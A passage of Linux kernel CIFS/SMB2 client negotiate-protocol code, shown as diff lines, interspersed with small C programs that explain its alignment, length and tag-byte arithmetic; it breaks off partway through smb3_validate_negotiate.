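#include <stdio.h>

/* Round x up to the next multiple of a (a must be a power of two),
 * which is exactly what ALIGN(x, a) does in the kernel. */
#define ALIGN_UP(x, a) (((x) + (a) - 1) & ~((a) - 1))

int main(void)
{
	unsigned int raw = 8 + 2 + 2; /* assumed header + count + one alg ID */

	printf("raw %u -> padded %u\n", raw, ALIGN_UP(raw, 8)); /* 12 -> 16 */
	return 0;
}
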
+-
+-static void
+-build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_ENCRYPTION_CAPABILITIES;
+-	if (require_gcm_256) {
+-		pneg_ctxt->DataLength = cpu_to_le16(4); /* Cipher Count + 1 cipher */
+-		pneg_ctxt->CipherCount = cpu_to_le16(1);
+-		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES256_GCM;
+-	} else if (enable_gcm_256) {
+-		pneg_ctxt->DataLength = cpu_to_le16(8); /* Cipher Count + 3 ciphers */
+-		pneg_ctxt->CipherCount = cpu_to_le16(3);
+-		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES128_GCM;
+-		pneg_ctxt->Ciphers[1] = SMB2_ENCRYPTION_AES256_GCM;
+-		pneg_ctxt->Ciphers[2] = SMB2_ENCRYPTION_AES128_CCM;
+-	} else {
+-		pneg_ctxt->DataLength = cpu_to_le16(6); /* Cipher Count + 2 ciphers */
+-		pneg_ctxt->CipherCount = cpu_to_le16(2);
+-		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES128_GCM;
+-		pneg_ctxt->Ciphers[1] = SMB2_ENCRYPTION_AES128_CCM;
+-	}
+-}
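
The DataLength constants 4, 6 and 8 above fall out of the layout: a 2-byte CipherCount followed by 2 bytes per cipher ID. A quick arithmetic check:

#include <stdio.h>

/* DataLength of the encryption negotiate context for n ciphers. */
static unsigned short encrypt_ctxt_datalen(unsigned short n)
{
	return 2 + 2 * n; /* CipherCount field + n cipher IDs */
}

int main(void)
{
	printf("1 cipher  -> %u\n", encrypt_ctxt_datalen(1)); /* 4 */
	printf("2 ciphers -> %u\n", encrypt_ctxt_datalen(2)); /* 6 */
	printf("3 ciphers -> %u\n", encrypt_ctxt_datalen(3)); /* 8 */
	return 0;
}
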
+-
+-static unsigned int
+-build_netname_ctxt(struct smb2_netname_neg_context *pneg_ctxt, char *hostname)
+-{
+-	struct nls_table *cp = load_nls_default();
+-
+-	pneg_ctxt->ContextType = SMB2_NETNAME_NEGOTIATE_CONTEXT_ID;
+-
+-	/* copy up to max of first 100 bytes of server name to NetName field */
+-	pneg_ctxt->DataLength = cpu_to_le16(2 * cifs_strtoUTF16(pneg_ctxt->NetName, hostname, 100, cp));
+-	/* context size is DataLength + minimal smb2_neg_context */
+-	return ALIGN(le16_to_cpu(pneg_ctxt->DataLength) + sizeof(struct smb2_neg_context), 8);
+-}
+-
+-static void
+-build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
+-{
+-	pneg_ctxt->ContextType = SMB2_POSIX_EXTENSIONS_AVAILABLE;
+-	pneg_ctxt->DataLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
+-	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
+-	pneg_ctxt->Name[0] = 0x93;
+-	pneg_ctxt->Name[1] = 0xAD;
+-	pneg_ctxt->Name[2] = 0x25;
+-	pneg_ctxt->Name[3] = 0x50;
+-	pneg_ctxt->Name[4] = 0x9C;
+-	pneg_ctxt->Name[5] = 0xB4;
+-	pneg_ctxt->Name[6] = 0x11;
+-	pneg_ctxt->Name[7] = 0xE7;
+-	pneg_ctxt->Name[8] = 0xB4;
+-	pneg_ctxt->Name[9] = 0x23;
+-	pneg_ctxt->Name[10] = 0x83;
+-	pneg_ctxt->Name[11] = 0xDE;
+-	pneg_ctxt->Name[12] = 0x96;
+-	pneg_ctxt->Name[13] = 0x8B;
+-	pneg_ctxt->Name[14] = 0xCD;
+-	pneg_ctxt->Name[15] = 0x7C;
+-}
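
The sixteen assignments above spell out SMB2_CREATE_TAG_POSIX byte by byte. The same bytes could live in one table and be copied with a single memcpy(), as in this hypothetical standalone rewrite:

#include <stdio.h>
#include <string.h>

/* SMB2_CREATE_TAG_POSIX: 0x93AD25509CB411E7B42383DE968BCD7C */
static const unsigned char posix_tag[16] = {
	0x93, 0xAD, 0x25, 0x50, 0x9C, 0xB4, 0x11, 0xE7,
	0xB4, 0x23, 0x83, 0xDE, 0x96, 0x8B, 0xCD, 0x7C,
};

int main(void)
{
	unsigned char name[16];
	int i;

	memcpy(name, posix_tag, sizeof(name)); /* one copy vs. 16 stores */
	for (i = 0; i < 16; i++)
		printf("%02X", name[i]);
	printf("\n");
	return 0;
}
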
+-
+-static void
+-assemble_neg_contexts(struct smb2_negotiate_req *req,
+-		      struct TCP_Server_Info *server, unsigned int *total_len)
+-{
+-	unsigned int ctxt_len, neg_context_count;
+-	struct TCP_Server_Info *pserver;
+-	char *pneg_ctxt;
+-	char *hostname;
+-
+-	if (*total_len > 200) {
+-		/* In case the length is corrupted, don't overrun the smb buffer */
+-		cifs_server_dbg(VFS, "Bad frame length assembling neg contexts\n");
+-		return;
+-	}
+-
+-	/*
+-	 * round up total_len of fixed part of SMB3 negotiate request to 8
+-	 * byte boundary before adding negotiate contexts
+-	 */
+-	*total_len = ALIGN(*total_len, 8);
+-
+-	pneg_ctxt = (*total_len) + (char *)req;
+-	req->NegotiateContextOffset = cpu_to_le32(*total_len);
+-
+-	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt);
+-	ctxt_len = ALIGN(sizeof(struct smb2_preauth_neg_context), 8);
+-	*total_len += ctxt_len;
+-	pneg_ctxt += ctxt_len;
+-
+-	build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt);
+-	ctxt_len = ALIGN(sizeof(struct smb2_encryption_neg_context), 8);
+-	*total_len += ctxt_len;
+-	pneg_ctxt += ctxt_len;
+-
+-	/*
+-	 * secondary channels don't have the hostname field populated;
+-	 * use the hostname field in the primary channel instead
+-	 */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-	cifs_server_lock(pserver);
+-	hostname = pserver->hostname;
+-	if (hostname && (hostname[0] != 0)) {
+-		ctxt_len = build_netname_ctxt((struct smb2_netname_neg_context *)pneg_ctxt,
+-					      hostname);
+-		*total_len += ctxt_len;
+-		pneg_ctxt += ctxt_len;
+-		neg_context_count = 3;
+-	} else
+-		neg_context_count = 2;
+-	cifs_server_unlock(pserver);
+-
+-	build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
+-	*total_len += sizeof(struct smb2_posix_neg_context);
+-	pneg_ctxt += sizeof(struct smb2_posix_neg_context);
+-	neg_context_count++;
+-
+-	if (server->compress_algorithm) {
+-		build_compression_ctxt((struct smb2_compression_capabilities_context *)
+-				pneg_ctxt);
+-		ctxt_len = ALIGN(sizeof(struct smb2_compression_capabilities_context), 8);
+-		*total_len += ctxt_len;
+-		pneg_ctxt += ctxt_len;
+-		neg_context_count++;
+-	}
+-
+-	if (enable_negotiate_signing) {
+-		ctxt_len = build_signing_ctxt((struct smb2_signing_capabilities *)
+-				pneg_ctxt);
+-		*total_len += ctxt_len;
+-		pneg_ctxt += ctxt_len;
+-		neg_context_count++;
+-	}
+-
+-	/* check for and add transport_capabilities and signing capabilities */
+-	req->NegotiateContextCount = cpu_to_le16(neg_context_count);
+-
+-}
+-
+-/* If the preauth context is invalid, warn but use what we requested (SHA-512) */
+-static void decode_preauth_context(struct smb2_preauth_neg_context *ctxt)
+-{
+-	unsigned int len = le16_to_cpu(ctxt->DataLength);
+-
+-	/*
+-	 * Caller checked that DataLength remains within SMB boundary. We still
+-	 * need to confirm that one HashAlgorithms member is accounted for.
+-	 */
+-	if (len < MIN_PREAUTH_CTXT_DATA_LEN) {
+-		pr_warn_once("server sent bad preauth context\n");
+-		return;
+-	} else if (len < MIN_PREAUTH_CTXT_DATA_LEN + le16_to_cpu(ctxt->SaltLength)) {
+-		pr_warn_once("server sent invalid SaltLength\n");
+-		return;
+-	}
+-	if (le16_to_cpu(ctxt->HashAlgorithmCount) != 1)
+-		pr_warn_once("Invalid SMB3 hash algorithm count\n");
+-	if (ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
+-		pr_warn_once("unknown SMB3 hash algorithm\n");
+-}
+-
+-static void decode_compress_ctx(struct TCP_Server_Info *server,
+-			 struct smb2_compression_capabilities_context *ctxt)
+-{
+-	unsigned int len = le16_to_cpu(ctxt->DataLength);
+-
+-	/*
+-	 * Caller checked that DataLength remains within SMB boundary. We still
+-	 * need to confirm that one CompressionAlgorithms member is accounted
+-	 * for.
+-	 */
+-	if (len < 10) {
+-		pr_warn_once("server sent bad compression cntxt\n");
+-		return;
+-	}
+-	if (le16_to_cpu(ctxt->CompressionAlgorithmCount) != 1) {
+-		pr_warn_once("Invalid SMB3 compress algorithm count\n");
+-		return;
+-	}
+-	if (le16_to_cpu(ctxt->CompressionAlgorithms[0]) > 3) {
+-		pr_warn_once("unknown compression algorithm\n");
+-		return;
+-	}
+-	server->compress_algorithm = ctxt->CompressionAlgorithms[0];
+-}
+-
+-static int decode_encrypt_ctx(struct TCP_Server_Info *server,
+-			      struct smb2_encryption_neg_context *ctxt)
+-{
+-	unsigned int len = le16_to_cpu(ctxt->DataLength);
+-
+-	cifs_dbg(FYI, "decode SMB3.11 encryption neg context of len %d\n", len);
+-	/*
+-	 * Caller checked that DataLength remains within SMB boundary. We still
+-	 * need to confirm that one Cipher flexible array member is accounted
+-	 * for.
+-	 */
+-	if (len < MIN_ENCRYPT_CTXT_DATA_LEN) {
+-		pr_warn_once("server sent bad crypto ctxt len\n");
+-		return -EINVAL;
+-	}
+-
+-	if (le16_to_cpu(ctxt->CipherCount) != 1) {
+-		pr_warn_once("Invalid SMB3.11 cipher count\n");
+-		return -EINVAL;
+-	}
+-	cifs_dbg(FYI, "SMB311 cipher type:%d\n", le16_to_cpu(ctxt->Ciphers[0]));
+-	if (require_gcm_256) {
+-		if (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES256_GCM) {
+-			cifs_dbg(VFS, "Server does not support requested encryption type (AES256 GCM)\n");
+-			return -EOPNOTSUPP;
+-		}
+-	} else if (ctxt->Ciphers[0] == 0) {
+-		/*
+-		 * e.g. if the server only supported AES256_CCM (very unlikely),
+-		 * or supported no encryption types, or had them all disabled.
+-		 * Since GLOBAL_CAP_ENCRYPTION will not be set, if the mount
+-		 * requested encryption ("seal"), the checks done later during
+-		 * tree connection will return the proper rc; but if seal was
+-		 * not requested by the client, we can't fail here, since the
+-		 * server is allowed to return 0 to indicate no supported cipher.
+-		 */
+-		server->cipher_type = 0;
+-		server->capabilities &= ~SMB2_GLOBAL_CAP_ENCRYPTION;
+-		pr_warn_once("Server does not support requested encryption types\n");
+-		return 0;
+-	} else if ((ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES128_CCM) &&
+-		   (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES128_GCM) &&
+-		   (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES256_GCM)) {
+-		/* server returned a cipher we didn't ask for */
+-		pr_warn_once("Invalid SMB3.11 cipher returned\n");
+-		return -EINVAL;
+-	}
+-	server->cipher_type = ctxt->Ciphers[0];
+-	server->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
+-	return 0;
+-}
+-
+-static void decode_signing_ctx(struct TCP_Server_Info *server,
+-			       struct smb2_signing_capabilities *pctxt)
+-{
+-	unsigned int len = le16_to_cpu(pctxt->DataLength);
+-
+-	/*
+-	 * Caller checked that DataLength remains within SMB boundary. We still
+-	 * need to confirm that one SigningAlgorithms flexible array member is
+-	 * accounted for.
+-	 */
+-	if ((len < 4) || (len > 16)) {
+-		pr_warn_once("server sent bad signing negcontext\n");
+-		return;
+-	}
+-	if (le16_to_cpu(pctxt->SigningAlgorithmCount) != 1) {
+-		pr_warn_once("Invalid signing algorithm count\n");
+-		return;
+-	}
+-	if (le16_to_cpu(pctxt->SigningAlgorithms[0]) > 2) {
+-		pr_warn_once("unknown signing algorithm\n");
+-		return;
+-	}
+-
+-	server->signing_negotiated = true;
+-	server->signing_algorithm = le16_to_cpu(pctxt->SigningAlgorithms[0]);
+-	cifs_dbg(FYI, "signing algorithm %d chosen\n",
+-		     server->signing_algorithm);
+-}
+-
+-
+-static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+-				     struct TCP_Server_Info *server,
+-				     unsigned int len_of_smb)
+-{
+-	struct smb2_neg_context *pctx;
+-	unsigned int offset = le32_to_cpu(rsp->NegotiateContextOffset);
+-	unsigned int ctxt_cnt = le16_to_cpu(rsp->NegotiateContextCount);
+-	unsigned int len_of_ctxts, i;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "decoding %d negotiate contexts\n", ctxt_cnt);
+-	if (len_of_smb <= offset) {
+-		cifs_server_dbg(VFS, "Invalid response: negotiate context offset\n");
+-		return -EINVAL;
+-	}
+-
+-	len_of_ctxts = len_of_smb - offset;
+-
+-	for (i = 0; i < ctxt_cnt; i++) {
+-		int clen;
+-		/* check that offset is not beyond end of SMB */
+-		if (len_of_ctxts < sizeof(struct smb2_neg_context))
+-			break;
+-
+-		pctx = (struct smb2_neg_context *)(offset + (char *)rsp);
+-		clen = sizeof(struct smb2_neg_context)
+-			+ le16_to_cpu(pctx->DataLength);
+-		/*
+-		 * 2.2.4 SMB2 NEGOTIATE Response
+-		 * Subsequent negotiate contexts MUST appear at the first 8-byte
+-		 * aligned offset following the previous negotiate context.
+-		 */
+-		if (i + 1 != ctxt_cnt)
+-			clen = ALIGN(clen, 8);
+-		if (clen > len_of_ctxts)
+-			break;
+-
+-		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES)
+-			decode_preauth_context(
+-				(struct smb2_preauth_neg_context *)pctx);
+-		else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES)
+-			rc = decode_encrypt_ctx(server,
+-				(struct smb2_encryption_neg_context *)pctx);
+-		else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES)
+-			decode_compress_ctx(server,
+-				(struct smb2_compression_capabilities_context *)pctx);
+-		else if (pctx->ContextType == SMB2_POSIX_EXTENSIONS_AVAILABLE)
+-			server->posix_ext_supported = true;
+-		else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES)
+-			decode_signing_ctx(server,
+-				(struct smb2_signing_capabilities *)pctx);
+-		else
+-			cifs_server_dbg(VFS, "unknown negcontext of type %d ignored\n",
+-				le16_to_cpu(pctx->ContextType));
+-		if (rc)
+-			break;
+-
+-		offset += clen;
+-		len_of_ctxts -= clen;
+-	}
+-	return rc;
+-}
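
The loop above advances a cursor through variable-length contexts, padding every entry except the last to the next 8-byte boundary. A self-contained model of that cursor arithmetic (the DataLength values are invented):

#include <stdio.h>

#define ALIGN_UP(x, a) (((x) + (a) - 1) & ~((a) - 1))
#define CTX_HDR 8 /* ContextType + DataLength + Reserved */

int main(void)
{
	unsigned int data_len[] = { 38, 4, 10 }; /* hypothetical contexts */
	unsigned int n = 3, offset = 0, i;

	for (i = 0; i < n; i++) {
		unsigned int clen = CTX_HDR + data_len[i];

		printf("context %u: offset %u, len %u\n", i, offset, clen);
		if (i + 1 != n) /* all but the last are 8-byte aligned */
			clen = ALIGN_UP(clen, 8);
		offset += clen;
	}
	return 0;
}
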
+-
+-static struct create_posix *
+-create_posix_buf(umode_t mode)
+-{
+-	struct create_posix *buf;
+-
+-	buf = kzalloc(sizeof(struct create_posix),
+-			GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset =
+-		cpu_to_le16(offsetof(struct create_posix, Mode));
+-	buf->ccontext.DataLength = cpu_to_le32(4);
+-	buf->ccontext.NameOffset =
+-		cpu_to_le16(offsetof(struct create_posix, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(16);
+-
+-	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
+-	buf->Name[0] = 0x93;
+-	buf->Name[1] = 0xAD;
+-	buf->Name[2] = 0x25;
+-	buf->Name[3] = 0x50;
+-	buf->Name[4] = 0x9C;
+-	buf->Name[5] = 0xB4;
+-	buf->Name[6] = 0x11;
+-	buf->Name[7] = 0xE7;
+-	buf->Name[8] = 0xB4;
+-	buf->Name[9] = 0x23;
+-	buf->Name[10] = 0x83;
+-	buf->Name[11] = 0xDE;
+-	buf->Name[12] = 0x96;
+-	buf->Name[13] = 0x8B;
+-	buf->Name[14] = 0xCD;
+-	buf->Name[15] = 0x7C;
+-	buf->Mode = cpu_to_le32(mode);
+-	cifs_dbg(FYI, "mode on posix create 0%o\n", mode);
+-	return buf;
+-}
+-
+-static int
+-add_posix_context(struct kvec *iov, unsigned int *num_iovec, umode_t mode)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = create_posix_buf(mode);
+-	if (mode == ACL_NO_MODE)
+-		cifs_dbg(FYI, "Invalid mode\n");
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct create_posix);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_posix));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-
+-/*
+- *
+- *	SMB2 Worker functions follow:
+- *
+- *	The general structure of the worker functions is:
+- *	1) Call smb2_init (assembles SMB2 header)
+- *	2) Initialize SMB2 command specific fields in fixed length area of SMB
+- *	3) Call smb_sendrcv2 (sends request on socket and waits for response)
+- *	4) Decode SMB2 command specific fields in the fixed length area
+- *	5) Decode variable length data area (if any for this SMB2 command type)
+- *	6) Call free smb buffer
+- *	7) return
+- *
+- */
+-
+-int
+-SMB2_negotiate(const unsigned int xid,
+-	       struct cifs_ses *ses,
+-	       struct TCP_Server_Info *server)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_negotiate_req *req;
+-	struct smb2_negotiate_rsp *rsp;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int rc;
+-	int resp_buftype;
+-	int blob_offset, blob_length;
+-	char *security_blob;
+-	int flags = CIFS_NEG_OP;
+-	unsigned int total_len;
+-
+-	cifs_dbg(FYI, "Negotiate protocol\n");
+-
+-	if (!server) {
+-		WARN(1, "%s: server is NULL!\n", __func__);
+-		return -EIO;
+-	}
+-
+-	rc = smb2_plain_req_init(SMB2_NEGOTIATE, NULL, server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	req->hdr.SessionId = 0;
+-
+-	memset(server->preauth_sha_hash, 0, SMB2_PREAUTH_HASH_SIZE);
+-	memset(ses->preauth_sha_hash, 0, SMB2_PREAUTH_HASH_SIZE);
+-
+-	if (strcmp(server->vals->version_string,
+-		   SMB3ANY_VERSION_STRING) == 0) {
+-		req->Dialects[0] = cpu_to_le16(SMB30_PROT_ID);
+-		req->Dialects[1] = cpu_to_le16(SMB302_PROT_ID);
+-		req->Dialects[2] = cpu_to_le16(SMB311_PROT_ID);
+-		req->DialectCount = cpu_to_le16(3);
+-		total_len += 6;
+-	} else if (strcmp(server->vals->version_string,
+-		   SMBDEFAULT_VERSION_STRING) == 0) {
+-		req->Dialects[0] = cpu_to_le16(SMB21_PROT_ID);
+-		req->Dialects[1] = cpu_to_le16(SMB30_PROT_ID);
+-		req->Dialects[2] = cpu_to_le16(SMB302_PROT_ID);
+-		req->Dialects[3] = cpu_to_le16(SMB311_PROT_ID);
+-		req->DialectCount = cpu_to_le16(4);
+-		total_len += 8;
+-	} else {
+-		/* otherwise send specific dialect */
+-		req->Dialects[0] = cpu_to_le16(server->vals->protocol_id);
+-		req->DialectCount = cpu_to_le16(1);
+-		total_len += 2;
+-	}
+-
+-	/* only one of SMB2 signing flags may be set in SMB2 request */
+-	if (ses->sign)
+-		req->SecurityMode = cpu_to_le16(SMB2_NEGOTIATE_SIGNING_REQUIRED);
+-	else if (global_secflags & CIFSSEC_MAY_SIGN)
+-		req->SecurityMode = cpu_to_le16(SMB2_NEGOTIATE_SIGNING_ENABLED);
+-	else
+-		req->SecurityMode = 0;
+-
+-	req->Capabilities = cpu_to_le32(server->vals->req_capabilities);
+-	if (ses->chan_max > 1)
+-		req->Capabilities |= cpu_to_le32(SMB2_GLOBAL_CAP_MULTI_CHANNEL);
+-
+-	/* ClientGUID must be zero for SMB2.02 dialect */
+-	if (server->vals->protocol_id == SMB20_PROT_ID)
+-		memset(req->ClientGUID, 0, SMB2_CLIENT_GUID_SIZE);
+-	else {
+-		memcpy(req->ClientGUID, server->client_guid,
+-			SMB2_CLIENT_GUID_SIZE);
+-		if ((server->vals->protocol_id == SMB311_PROT_ID) ||
+-		    (strcmp(server->vals->version_string,
+-		     SMB3ANY_VERSION_STRING) == 0) ||
+-		    (strcmp(server->vals->version_string,
+-		     SMBDEFAULT_VERSION_STRING) == 0))
+-			assemble_neg_contexts(req, server, &total_len);
+-	}
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-	rsp = (struct smb2_negotiate_rsp *)rsp_iov.iov_base;
+-	/*
+-	 * No tcon so can't do
+-	 * cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_fail[SMB2...]);
+-	 */
+-	if (rc == -EOPNOTSUPP) {
+-		cifs_server_dbg(VFS, "Dialect not supported by server. Consider specifying vers=1.0 or vers=2.0 on mount for accessing older servers\n");
+-		goto neg_exit;
+-	} else if (rc != 0)
+-		goto neg_exit;
+-
+-	rc = -EIO;
+-	if (strcmp(server->vals->version_string,
+-		   SMB3ANY_VERSION_STRING) == 0) {
+-		if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID)) {
+-			cifs_server_dbg(VFS,
+-				"SMB2 dialect returned but not requested\n");
+-			goto neg_exit;
+-		} else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID)) {
+-			cifs_server_dbg(VFS,
+-				"SMB2.1 dialect returned but not requested\n");
+-			goto neg_exit;
+-		} else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
+-			/* ops were set to 3.0 by default, so update to 3.1.1 */
+-			server->ops = &smb311_operations;
+-			server->vals = &smb311_values;
+-		}
+-	} else if (strcmp(server->vals->version_string,
+-		   SMBDEFAULT_VERSION_STRING) == 0) {
+-		if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID)) {
+-			cifs_server_dbg(VFS,
+-				"SMB2 dialect returned but not requested\n");
+-			goto neg_exit;
+-		} else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID)) {
+-			/* ops were set to 3.0 by default, so update to 2.1 */
+-			server->ops = &smb21_operations;
+-			server->vals = &smb21_values;
+-		} else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
+-			server->ops = &smb311_operations;
+-			server->vals = &smb311_values;
+-		}
+-	} else if (le16_to_cpu(rsp->DialectRevision) !=
+-				server->vals->protocol_id) {
+-		/* if requested single dialect ensure returned dialect matched */
+-		cifs_server_dbg(VFS, "Invalid 0x%x dialect returned: not requested\n",
+-				le16_to_cpu(rsp->DialectRevision));
+-		goto neg_exit;
+-	}
+-
+-	cifs_dbg(FYI, "mode 0x%x\n", rsp->SecurityMode);
+-
+-	if (rsp->DialectRevision == cpu_to_le16(SMB20_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb2.0 dialect\n");
+-	else if (rsp->DialectRevision == cpu_to_le16(SMB21_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb2.1 dialect\n");
+-	else if (rsp->DialectRevision == cpu_to_le16(SMB30_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb3.0 dialect\n");
+-	else if (rsp->DialectRevision == cpu_to_le16(SMB302_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb3.02 dialect\n");
+-	else if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID))
+-		cifs_dbg(FYI, "negotiated smb3.1.1 dialect\n");
+-	else {
+-		cifs_server_dbg(VFS, "Invalid dialect returned by server 0x%x\n",
+-				le16_to_cpu(rsp->DialectRevision));
+-		goto neg_exit;
+-	}
+-
+-	rc = 0;
+-	server->dialect = le16_to_cpu(rsp->DialectRevision);
+-
+-	/*
+-	 * Keep a copy of the hash after negprot. This hash will be
+-	 * the starting hash value for all sessions made from this
+-	 * server.
+-	 */
+-	memcpy(server->preauth_sha_hash, ses->preauth_sha_hash,
+-	       SMB2_PREAUTH_HASH_SIZE);
+-
+-	/* SMB2 only has an extended negflavor */
+-	server->negflavor = CIFS_NEGFLAVOR_EXTENDED;
+-	/* set it to the maximum buffer size value we can send with 1 credit */
+-	server->maxBuf = min_t(unsigned int, le32_to_cpu(rsp->MaxTransactSize),
+-			       SMB2_MAX_BUFFER_SIZE);
+-	server->max_read = le32_to_cpu(rsp->MaxReadSize);
+-	server->max_write = le32_to_cpu(rsp->MaxWriteSize);
+-	server->sec_mode = le16_to_cpu(rsp->SecurityMode);
+-	if ((server->sec_mode & SMB2_SEC_MODE_FLAGS_ALL) != server->sec_mode)
+-		cifs_dbg(FYI, "Server returned unexpected security mode 0x%x\n",
+-				server->sec_mode);
+-	server->capabilities = le32_to_cpu(rsp->Capabilities);
+-	/* Internal types */
+-	server->capabilities |= SMB2_NT_FIND | SMB2_LARGE_FILES;
+-
+-	/*
+-	 * SMB3.0 supports only 1 cipher and doesn't have an encryption neg context.
+-	 * Set the cipher type manually.
+-	 */
+-	if (server->dialect == SMB30_PROT_ID && (server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
+-		server->cipher_type = SMB2_ENCRYPTION_AES128_CCM;
+-
+-	security_blob = smb2_get_data_area_len(&blob_offset, &blob_length,
+-					       (struct smb2_hdr *)rsp);
+-	/*
+-	 * See MS-SMB2 section 2.2.4: if no blob, client picks default which
+-	 * for us will be
+-	 *	ses->sectype = RawNTLMSSP;
+-	 * but for the time being this is our only auth choice, so it doesn't matter.
+-	 * We just found a server which sets blob length to zero expecting raw.
+-	 */
+-	if (blob_length == 0) {
+-		cifs_dbg(FYI, "missing security blob on negprot\n");
+-		server->sec_ntlmssp = true;
+-	}
+-
+-	rc = cifs_enable_signing(server, ses->sign);
+-	if (rc)
+-		goto neg_exit;
+-	if (blob_length) {
+-		rc = decode_negTokenInit(security_blob, blob_length, server);
+-		if (rc == 1)
+-			rc = 0;
+-		else if (rc == 0)
+-			rc = -EIO;
+-	}
+-
+-	if (rsp->DialectRevision == cpu_to_le16(SMB311_PROT_ID)) {
+-		if (rsp->NegotiateContextCount)
+-			rc = smb311_decode_neg_context(rsp, server,
+-						       rsp_iov.iov_len);
+-		else
+-			cifs_server_dbg(VFS, "Missing expected negotiate contexts\n");
+-	}
+-neg_exit:
+-	free_rsp_buf(resp_buftype, rsp);
+-	return rc;
+-}
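
The total_len adjustments in SMB2_negotiate() (+6 for three dialects, +8 for four, +2 for one) are simply 2 bytes per 16-bit dialect ID appended after the fixed part:

#include <stdio.h>

int main(void)
{
	int count;

	for (count = 1; count <= 4; count++)
		printf("%d dialect(s) -> %d extra bytes\n", count, 2 * count);
	return 0;
}
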
+-
+-int smb3_validate_negotiate(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-	int rc;
+-	struct validate_negotiate_info_req *pneg_inbuf;
+-	struct validate_negotiate_info_rsp *pneg_rsp = NULL;
+-	u32 rsplen;
+-	u32 inbuflen; /* max of 4 dialects */
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	cifs_dbg(FYI, "validate negotiate\n");
+-
+-	/* In SMB3.11 preauth integrity supersedes validate negotiate */
+-	if (server->dialect == SMB311_PROT_ID)
+-		return 0;
+-
+-	/*
+-	 * The validation ioctl must be signed, so there is no point sending
+-	 * this if we cannot sign it (i.e. are not a known user). Even if
+-	 * signing is not required (enabled but not negotiated), in those
+-	 * cases we selectively sign just this, the first and only signed
+-	 * request on a connection. Having validation of negotiate info
+-	 * helps reduce attack vectors.
+-	 */
+-	if (tcon->ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST)
+-		return 0; /* validation requires signing */
+-
+-	if (tcon->ses->user_name == NULL) {
+-		cifs_dbg(FYI, "Can't validate negotiate: null user mount\n");
+-		return 0; /* validation requires signing */
+-	}
+-
+-	if (tcon->ses->session_flags & SMB2_SESSION_FLAG_IS_NULL)
+-		cifs_tcon_dbg(VFS, "Unexpected null user (anonymous) auth flag sent by server\n");
+-
+-	pneg_inbuf = kmalloc(sizeof(*pneg_inbuf), GFP_NOFS);
+-	if (!pneg_inbuf)
+-		return -ENOMEM;
+-
+-	pneg_inbuf->Capabilities =
+-			cpu_to_le32(server->vals->req_capabilities);
+-	if (tcon->ses->chan_max > 1)
+-		pneg_inbuf->Capabilities |= cpu_to_le32(SMB2_GLOBAL_CAP_MULTI_CHANNEL);
+-
+-	memcpy(pneg_inbuf->Guid, server->client_guid,
+-					SMB2_CLIENT_GUID_SIZE);
+-
+-	if (tcon->ses->sign)
+-		pneg_inbuf->SecurityMode =
+-			cpu_to_le16(SMB2_NEGOTIATE_SIGNING_REQUIRED);
+-	else if (global_secflags & CIFSSEC_MAY_SIGN)
+-		pneg_inbuf->SecurityMode =
